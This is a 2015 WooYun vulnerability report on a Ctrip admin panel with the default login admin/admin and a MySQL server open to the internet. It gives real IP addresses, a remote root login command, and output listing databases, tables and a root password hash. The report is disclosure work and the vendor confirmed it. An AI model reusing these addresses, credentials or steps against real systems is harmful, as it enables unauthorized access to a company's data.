当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122126

漏洞标题:携程某后台若口令导致数据沦陷(可以拖库)

相关厂商:携程旅行网

漏洞作者: new

提交时间:2015-06-22 17:06

修复时间:2015-08-07 10:48

公开时间:2015-08-07 10:48

漏洞类型:重要敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-22: 细节已通知厂商并且等待厂商处理中
2015-06-23: 厂商已经确认,细节仅向厂商公开
2015-07-03: 细节向核心白帽子及相关领域专家公开
2015-07-13: 细节向普通白帽子公开
2015-07-23: 细节向实习白帽子公开
2015-08-07: 细节向公众公开

简要描述:

携程某后台若口令导致敏感信息泄漏,数据库对外开放链接,完全沦陷

详细说明:

1. http://140.207.229.58:9090/
应用地址,改地址是我扫携程c端扫出来的,经确认228和229确实为携程所有
密码:admin/admin
这里边敏感信息比较多,来张图证明一下:

123.png


这些都没什么,系统信息中直接把数据库用户、密码直接显示出来,我只能呵呵。
2.数据库对外开放链接,数据完全公开

[new@arch ~]$ mysql -u root -h 140.207.229.59 -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 4138
Server version: 5.1.73 Source distribution
Copyright (c) 2000, 2014, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| activity           |
| dev2newproduct     |
| dev2newshopproduct |
| mysql              |
| openfiredb         |
| shop_userdb        |
| test               |
+--------------------+
8 rows in set (0.03 sec)
MySQL [(none)]> select host,password,user from mysql.user;
+-----------+-------------------------------------------+------+
| host      | password                                  | user |
+-----------+-------------------------------------------+------+
| localhost | *04B698231DE00D6CA8CC98B5E154AE2DD38E9F25 | root |
| vms10013  |                                           | root |
| 127.0.0.1 |                                           | root |
| localhost |                                           |      |
| vms10013  |                                           |      |
| %         | *04B698231DE00D6CA8CC98B5E154AE2DD38E9F25 | root |
+-----------+-------------------------------------------+------+
6 rows in set (0.03 sec)
MySQL [(none)]> use dev2newproduct;
Database changed
MySQL [dev2newproduct]> show tables;
+----------------------------+
| Tables_in_dev2newproduct   |
+----------------------------+
| activity                   |
| activityAddress_open       |
| activity_address           |
| activity_detail            |
| activity_people            |
| activity_type              |
| article                    |
| article_type               |
| brand                      |
| category                   |
| category_product           |
| category_props             |
| category_props_show_type   |
| category_props_value       |
| comment                    |
| comment_detail             |
| facilities                 |
| facilitiesDetail           |
| facilitiesType             |
| product                    |
| product_custmer_props      |
| product_detail             |
| product_pic_group          |
| product_props_value        |
| schedule                   |
| schedule_momo              |
| schedule_remind            |
| sku                        |
| sku_curtomer_propertyvalue |
| sku_detail                 |
| sku_prop                   |
| sku_propsValue             |
| supplier                   |
| t_weather                  |
| tb_articledetail           |
| temp_category              |
| temp_shop                  |
| temp_shop_product          |
| temp_shopsku               |
+----------------------------+
39 rows in set (0.04 sec)


没查你具体数据,就不打

漏洞证明:

同上

ctrip456.png

修复方案:

修改口令,修改数据库对外链接限制。(这么多数据,数据库root,我就不拿shell了,求给个20rank)

版权声明:转载请注明来源 new@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-06-23 10:47

厂商回复:

非常感谢您对此漏洞信息的提交,已联系相关人员进行处理

最新状态:

暂无